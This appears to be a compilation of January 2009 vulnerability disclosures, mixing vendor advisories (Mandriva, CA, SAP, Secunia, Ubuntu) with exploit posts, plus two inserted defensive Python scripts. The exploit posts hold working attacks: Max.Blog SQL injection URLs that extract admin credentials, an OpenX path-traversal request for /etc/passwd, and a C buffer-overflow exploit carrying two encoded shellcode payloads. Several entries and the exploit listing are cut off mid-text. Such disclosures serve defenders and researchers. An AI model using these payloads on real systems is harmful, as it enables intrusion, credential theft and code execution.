Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
### Salvatore "drosophila" Fresta ###

Application: Max.Blog
             http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com

- BUGS

SQL Injection:

Requisites: magic quotes = off
File affected: submit_post.php

This bug allows a registered user to view the username and password (md5) of the registered user with the specified id (usually 1 for the admin):

http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

-- Salvatore "drosophila" Fresta
[ MDVSA-2009:030 ] amarok
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:030
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : amarok
 Date    : January 26, 2009
 Affected: 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Data length values in the metadata of Audible Audio media files (.aa) can lead to an integer overflow, which remote attackers can use to trigger a heap overflow and possibly execute arbitrary code (CVE-2009-0135).

 A missing check on heap allocation for Audible Audio media files (.aa) allows remote attackers to cause a denial of service or execute arbitrary code via a crafted media file (CVE-2009-0136).

 This update provides the fix for these security issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0135
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0136
 _______________________________________________________________________

 Updated Packages:

 (Package list with MD5 checksums for Mandriva Linux 2008.1 and 2009.0, i586 and x86_64, omitted.)
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can
Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
### Salvatore "drosophila" Fresta ###

Application: Max.Blog
             http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 20 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com

- BUGS

SQL Injection:

File affected: show_post.php

This bug allows a guest to view the username and password (md5) of the registered user with the specified id (usually 1 for the admin):

http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23

-- Salvatore "drosophila" Fresta
CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities

CA Advisory Reference: CA20090126-01
CA Advisory Date: 2009-01-26
Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG
Impact: A remote attacker can evade detection.

Summary:
The CA Anti-Virus engine contains multiple vulnerabilities that can allow a remote attacker to evade detection by the Anti-Virus engine by creating a malformed archive file in one of several common file archive formats. CA has released a new Anti-Virus engine to address the vulnerabilities.

The vulnerabilities, CVE-2009-0042, are due to improper handling of malformed archive files by the Anti-Virus engine. A remote attacker can create a malformed archive file that potentially contains malware and evades anti-virus detection.

Note: After files have been extracted from an archive, the desktop Anti-Virus engine is able to scan all files for malware. Consequently, detection evasion can be a concern for gateway anti-virus software if archives are not scanned, but the risk is effectively mitigated by the desktop anti-virus engine.

Mitigating Factors: See note above.

Severity: CA has given these vulnerabilities a Low risk rating.

Affected Products:
  CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1, r8, r8.1
  CA Anti-Virus 2007 (v8), 2008
  eTrust EZ Antivirus r7, r6.1
  CA Internet Security Suite 2007 (v3), 2008
  CA Internet Security Suite Plus 2008
  CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8, 8.1
  CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
  CA Protection Suites r2, r3, r3.1
  CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0, 8.1
  CA Anti-Spyware for the Enterprise (formerly eTrust PestPatrol) r8, 8.1
  CA Anti-Spyware 2007, 2008
  CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0, r3.1, r11, r11.1
  CA ARCserve Backup r11.1, r11.5, r12 on Windows
  CA ARCserve Backup r11.1, r11.5 Linux
  CA ARCserve client agent for Windows
  CA eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1, 4.0
  CA Common Services (CCS) r11, r11.1
  CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)

Non-Affected Products:
  CA Anti-Virus engine with arclib version 7.3.0.15 installed

Affected Platforms:
  Windows
  UNIX
  Linux
  Solaris
  Mac OS X
  NetWare

Status and Recommendation:
CA released arclib 7.3.0.15 in September 2008. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.

How to determine if you are affected:

For products on Windows:
  1. Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
  2. Right click on the file and select Properties.
  3. Select the Version tab.
  4. If the file version is earlier than indicated below, the installation is vulnerable.

  File Name    File Version
  arclib.dll   7.3.0.15

  * For eTrust Intrusion Detection 2.0 the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 SP1 the file is located in "Program Files\CA\Intrusion Detection\Common".

For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 7.3.0.15, the installation is vulnerable.

Example compver utility output:

  COMPONENT NAME                            VERSION
  eTrust Antivirus Arclib Archive Library   7.3.0.15
  ... (followed by other components)

For reference, the following are the file names for arclib on non-Windows operating systems:

  Operating System   File name
  Solaris            libarclib.so
  Linux              libarclib.so
  Mac OS X           arclib.bundle

Workaround:
Do not open email attachments or download files from untrusted sources.

References (URLs may wrap):

CA Support:
http://support.ca.com/

CA20090126-01: Security Notice for CA Anti-Virus Engine
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197601

Solution Document Reference APARs: n/a

CA Security Response Blog posting:
CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26.aspx

Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG
http://www.nruns.com/
http://secdev.zoller.lu

CVE References:
CVE-2009-0042 - Anti-Virus detection evasion
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0042

OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional informati
Total video player 1.3.7 local buffer overflow universal exploit
```c
/*
 * simo36.tvp-bof.c
 * Author : SimO-s0fT
 * Home   : www.exploiter-ma.com
 * greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame ,
 *             all arab4services.net and friends bahjawi danger khod nasi7a
 *
 * Register state at the crash:
 * EAX 0034F928 ASCII "AA
 * ECX 4141
 * EDX 00340608
 * EBX 41414141
 * ESP 0012BF44
 * EBP 0012C160
 * ESI 0034F920 ASCII "AA
 * EDI 41414141
 * EIP 7C92B3FB ntdll.7C92B3FB
 */
#include <stdio.h>
/* three further #include lines follow in the original; their header
   names were stripped during extraction */

#define OFFSET 549

/* M3U header: "#EXTM3U\r\n#EXTINF:3:50,-Mohamed Ghannam - DAOUDI 4EVER\r\nD:\" */
char twacha[] =
"\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46"
"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47"
"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20"
"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c";

/* first payload, as in the original */
char scode1[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a";

/* second payload, as in the original */
char scode2[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

int main(int argc, char *argv[])
{
    FILE *openfile;
    unsigned char *buffer;
    unsigned int offset = 0;
    unsigned int RET = 0x7c85d568;
    int number = 0;

    printf("*\n");
    printf("Total Video Player local universal buffer overflow exploit\n");
    printf("Cded by SimO-s0fT(s...@exploiter-ma.com)");
    printf("greetz : to Allah \n");
    printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n");
    printf("***\n");
    scanf("%d", &number);
    if ((openfile = fopen(argv[1], "wb")) == NULL) {
        perror("connot opening .!!\n");
        /* the listing is cut off here in the source */
```
SAP NetWeaver XSS Vulnerability
#
#  COMPASS SECURITY ADVISORY
#  http://www.csnc.ch/en/downloads/advisories.html
#
#  Product:  NetWeaver/Web DynPro
#  Vendor:   SAP (www.sap.com)
#  CVE ID:   CVE-2008-3358
#  Subject:  Cross-Site Scripting Vulnerability
#  Risk:     High
#  Effect:   Remotely exploitable
#  Author:   Martin Suess
#  Date:     January 27th 2009
#

Introduction:
-------------
The vulnerability found targets the SAP NetWeaver portal. It is possible to execute JavaScript code in the browser of a valid user when that user clicks on a specially crafted URL, which can be sent to the user by email. This vulnerability can be used to steal the user's session cookie or to redirect him to a phishing website that shows a (faked) login screen and captures his logon credentials as soon as he tries to log in on the faked site.

Affected:
---------
- All tested versions that are vulnerable: SAP NetWeaver/Web DynPro
  [for detailed information, see SAP Notification 1235253]

Description:
------------
A specially crafted URL in SAP NetWeaver allows an attacker to launch a Cross-Site Scripting attack. The resulting page contains only the unfiltered value of the vulnerable parameter. It is possible to create a URL which causes the resulting page to contain malicious JavaScript code.

A response to such a request could look like the following example:

  HTTP/1.1 200 OK
  Date: Fri, 18 Jul 2008 13:13:30 GMT
  Server:
  content-type: text/plain
  Content-Length: 67
  Keep-Alive: timeout=10, max=500
  Connection: Keep-Alive

  test

The code only gets executed in Microsoft Internet Explorer (tested with version 7.0.5730 only). In Firefox (tested with version 3.0 only) it did not get executed, as the content-type header of the server response (text/plain) is interpreted more strictly.

SAP Information Policy:
-----------------------
The information is available to registered SAP clients only (SAP Security Notes).

Patches:
--------
Apply the latest SAP security patches for Netweaver. For more detailed patch information, see SAP notification number 1235253.

Timeline:
---------
Vendor Status:    Patch released
Vendor Notified:  July 21st 2008
Vendor Response:  July 28th 2008
Patch available:  October 2008
Advisory Release: January 27th 2009

References:
-----------
- SAP Notification 1235253 (problem and patches)
JetAudio Basic 7.0.3 BufferOverFlow PoC
```python
#!/usr/bin/python
# By ALpHaNiX
# NullArea.Net
# proof of concept
#
# Register state at the crash:
# EAX
# ECX 41414141
# EDX 0001
# EBX 7FFD3000
# ESP 04ECFD8C
# EBP 04ECFDBC
# ESI 041F8648
# EDI 41414141
# EIP 7711737D kernel32.7711737D
# ESI & EDI overwritten

print("[+] JetAudio Basic 7.0.3 BufferOverFlow PoC")
lol = "alpix.m3u"
# write a playlist consisting of 1065987 'A' (0x41) bytes
with open(lol, "wb") as f:
    f.write(b"\x41" * 1065987)
print("[+]", lol, "File created")
```
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities (Updated - v1.1)
Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities

CA Advisory Reference: CA20090123-01
CA Advisory Date: 2009-01-23
Reported By: n/a
Impact: Refer to the CVE identifiers for details.

Summary:
Multiple security risks exist in Apache Tomcat as included with CA Cohesion Application Configuration Manager. CA has issued an update to address the vulnerabilities. Refer to the References section for the full list of resolved issues by CVE identifier.

Mitigating Factors: None

Severity: CA has given these vulnerabilities a Medium risk rating.

Affected Products:
  CA Cohesion Application Configuration Manager 4.5

Non-Affected Products:
  CA Cohesion Application Configuration Manager 4.5 SP1

Affected Platforms: Windows

Status and Recommendation:
CA has issued the following update to address the vulnerabilities.

CA Cohesion Application Configuration Manager 4.5:
  RO04648
  https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=RO04648

How to determine if you are affected:
  1. Using Windows Explorer, locate the file "RELEASE-NOTES".
  2. By default, the file is located in the "C:\Program Files\CA\Cohesion\Server\server\" directory.
  3. Open the file with a text editor.
  4. If the version is less than 5.5.25, the installation is vulnerable.
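Both CA advisories on this page reduce to comparing an installed dotted version against a fixed one (arclib.dll against 7.3.0.15, the Tomcat RELEASE-NOTES version against 5.5.25). The check below is an added example, not CA's own tooling; it compares field by field, which matters because a plain string comparison ranks 7.3.0.9 above 7.3.0.15, and it pulls the Arclib line out of compver-style output (the sample output is constructed to match the format the CA Anti-Virus advisory quotes).

```python
"""Numeric dotted-version comparison for the CA advisory checks.
Added example; not part of either CA advisory."""
import re

ARCLIB_FIXED = "7.3.0.15"          # CA20090126-01: arclib.dll / libarclib.so
COHESION_TOMCAT_FIXED = "5.5.25"   # CA20090123-01: Tomcat RELEASE-NOTES


def parse_version(text):
    """'7.3.0.15' -> (7, 3, 0, 15).  Parsing stops at the first field that
    does not start with a digit, so '5.5.25-beta' -> (5, 5, 25)."""
    fields = []
    for part in text.strip().split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        fields.append(int(m.group()))
    if not fields:
        raise ValueError(f"no numeric version in {text!r}")
    return tuple(fields)


def is_vulnerable(installed, fixed):
    """True when installed < fixed, comparing numerically field by field.
    Shorter tuples are zero-padded so that 5.5 == 5.5.0."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def arclib_version_from_compver(output):
    """Return the version on the Arclib line of compver-style output
    (two columns: component name, version), or None if there is no such line."""
    for line in output.splitlines():
        if "Arclib" in line:
            m = re.search(r"(\d+(?:\.\d+)+)\s*$", line)
            if m:
                return m.group(1)
    return None


# Constructed sample in the layout the advisory shows; the second component
# line is made up for illustration.
SAMPLE_COMPVER = """\
COMPONENT NAME                              VERSION
eTrust Antivirus Arclib Archive Library     7.3.0.12
Example Other Component                     1.2.3.4
"""

if __name__ == "__main__":
    found = arclib_version_from_compver(SAMPLE_COMPVER)
    print("Arclib", found, "vulnerable:", is_vulnerable(found, ARCLIB_FIXED))
    print("Tomcat 5.5.20 vulnerable:", is_vulnerable("5.5.20", COHESION_TOMCAT_FIXED))
    # string comparison gets the arclib case wrong:
    print("'7.3.0.9' < '7.3.0.15' as strings:", "7.3.0.9" < "7.3.0.15")
```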
Workaround: None

References (URLs may wrap):

CA Support:
http://support.ca.com/

CA20090123-01: Security Notice for Cohesion Tomcat
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197540

Solution Document Reference APARs: RO04648

CA Security Response Blog posting:
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx

Reported By: n/a

CVE References:
CVE-2005-2090    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090
CVE-2005-3510    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3510
CVE-2006-3835    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3835
CVE-2006-7195    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7195
CVE-2006-7196    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7196
CVE-2007-0450    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
CVE-2007-1355    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1355
CVE-2007-1358    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1358
CVE-2007-1858    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1858
CVE-2007-2449    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
CVE-2007-2450    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
CVE-2007-3382    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
CVE-2007-3385 *  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
CVE-2007-3386    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
CVE-2008-0128    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128

* Note: the issue was not completely fixed by the Tomcat maintainers.

OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release
v1.1 - Updated Impact, Summary, Affected Products

Customers who require additional information should contact CA Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749

Contact         http://www.ca.com/us/contact/
Legal Notice    http://www.ca.com/us/legal/
Privacy Policy  http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.
OpenX 2.6.3 - Local File Inclusion
I have found a local file inclusion exploit in OpenX 2.6.3. It is in the script "fc.php", located in /www/delivery/. Here is a snip of the code:

[snip]
```php
include_once '../../init-delivery.php';

$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if (!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
    echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
    exit(1);
}

$tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME];
$tagFileName = MAX_PATH . '/plugins/invocationTags/' . $tagName . '/' . $tagName . '.delivery.php';
if (!file_exists($tagFileName)) {
    echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists';
    exit(1);
}
include $tagFileName;
```
[/snip]

As you can see, it only checks whether the file you have input exists. This can be exploited like so:

http://host/path/to/openx/www/delivery/fc.php??MAX_type=../../../../../../../../../../../../../../etc/passwd%00

Enjoy.

-Charlie [Elites0ft.com]
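The two request shapes described on this page, the Max.Blog quote-break followed by UNION SELECT and the OpenX fc.php traversal with a trailing NUL byte, are easy to pick out of web-server access logs after the fact. The scanner below is an added example, not from either advisory: it parses Apache combined-format lines, decodes each query value (a second time, to catch double-encoding) and reports the parameter that matched; the log lines are constructed.

```python
"""Flag UNION-based SQL injection and traversal/NUL-byte LFI attempts in
Apache combined access logs.  Added example; the sample lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" log line; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})\b'
)
# A string-literal break followed by UNION [ALL] SELECT (the Max.Blog PoC shape).
SQLI_RE = re.compile(r"""['"]\s*union\s+(?:all\s+)?select\b""", re.IGNORECASE)
# Two or more "../" segments, or a NUL byte used to truncate the path (the OpenX PoC shape).
LFI_RE = re.compile(r"(?:\.\./){2,}|\x00")


def suspicious_params(target):
    """Return (name, value, kind) for each query parameter of a request target
    whose value matches a pattern.  parse_qsl decodes once; the value is then
    decoded again so double-encoded payloads (%2527 -> %27 -> ') are seen too."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for candidate in (value, unquote_plus(value)):
            if SQLI_RE.search(candidate):
                hits.append((name, candidate, "sqli"))
                break
            if LFI_RE.search(candidate):
                hits.append((name, candidate, "lfi"))
                break
    return hits


def scan(lines):
    """One finding dict per matching parameter.  Lines that do not parse are
    skipped so one garbage line cannot abort the whole scan."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value, kind in suspicious_params(m["target"]):
            findings.append({
                "ip": m["ip"], "time": m["ts"],
                "path": urlsplit(m["target"]).path,
                "param": name, "kind": kind, "status": int(m["status"]),
            })
    return findings


# Constructed sample log: the two PoC request shapes from the advisories, two
# benign requests, a double-encoded variant, and one unparsable line.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Jan/2009:10:15:02 +0100] "GET /blog/submit_post.php?draft=-1%27+UNION+ALL+SELECT+1,NULL,NULL,4+FROM+users%23 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Jan/2009:10:16:40 +0100] "GET /openx/www/delivery/fc.php?MAX_type=../../../../../../etc/passwd%00 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [27/Jan/2009:10:17:01 +0100] "GET /openx/www/delivery/fc.php?MAX_type=adjs HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [27/Jan/2009:10:17:05 +0100] "GET /blog/show_post.php?id=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Jan/2009:10:18:33 +0100] "GET /blog/show_post.php?id=-1%2527%2BUNION%2BALL%2BSELECT%2B1,2,3,4,5,6,7 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind'].upper():4} {f['path']} "
              f"param={f['param']} status={f['status']}")
```

The same parameter-level matching works on a proxy or WAF log once the request target is extracted; the status column is kept because a 200 on the fc.php line is the more worrying outcome.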
Secunia Research: OpenX Multiple Vulnerabilities
======================================================================
Secunia Research 27/01/2009

- OpenX Multiple Vulnerabilities -
======================================================================

Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

======================================================================
1) Affected Software

* OpenX 2.6.3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: SQL Injection
        Local File Inclusion
        Cross-Site Scripting
        Cross-Site Request Forgery
Where:  Remote

======================================================================
3) Vendor's Description of Software

"OpenX is a popular free ad server used to manage the advertising on over 100,000 websites in more than 100 countries around the world. Use OpenX to take control of the advertising on your sites".

Product Link:
http://www.openx.org/

======================================================================
4) Description of Vulnerabilities

Multiple vulnerabilities have been discovered in OpenX, which can be exploited by malicious people to conduct cross-site scripting, cross-site request forgery, and file inclusion attacks and by malicious users to conduct script insertion and SQL injection attacks.

1) Input passed to the "clientid" parameter in "www/admin/banner-acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php", "www/admin/advertiser-campaigns.php", "www/admin/campaign-banners.php", and "www/admin/banner-activate.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

2) Input passed to the "orderdirection" and "listorder" parameters in "www/admin/userlog-index.php" and "www/admin/stats.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

3) Input passed to the "origPublisherId" parameter in "www/admin/userlog-index.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

4) Input passed to the "setPerPage", "day", "period_end", "period_start", and "statsBreakdown" parameters in "www/admin/stats.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

5) Input passed to the "campaignid" parameter in "www/admin/banner-acl.php", "www/admin/banner-edit.php", "www/admin/banner-acl.php", "www/admin/campaign-zone.php", and "www/admin/campaign-banners.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

6) Input passed to the "bannerid" parameter in "www/admin/banner-acl.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

7) Input passed to the "affiliateid" parameter in "www/admin/zone-probability.php", "www/admin/zone-invocation.php", "www/admin/affiliate-zones.php", and "www/admin/zone-include.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

8) Input passed to the "zoneid" parameter in "www/admin/zone-probability.php", "www/admin/zone-invocation.php", and "www/admin/zone-include.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

9) Input passed to the "userid" parameter in "www/admin/admin-user.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbi
[USN-712-1] Vim vulnerabilities
===========================================================
Ubuntu Security Notice USN-712-1            January 27, 2009
vim vulnerabilities
CVE-2008-2712, CVE-2008-4101
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  vim          1:6.4-006+2ubuntu6.2
  vim-runtime  1:6.4-006+2ubuntu6.2

Ubuntu 7.10:
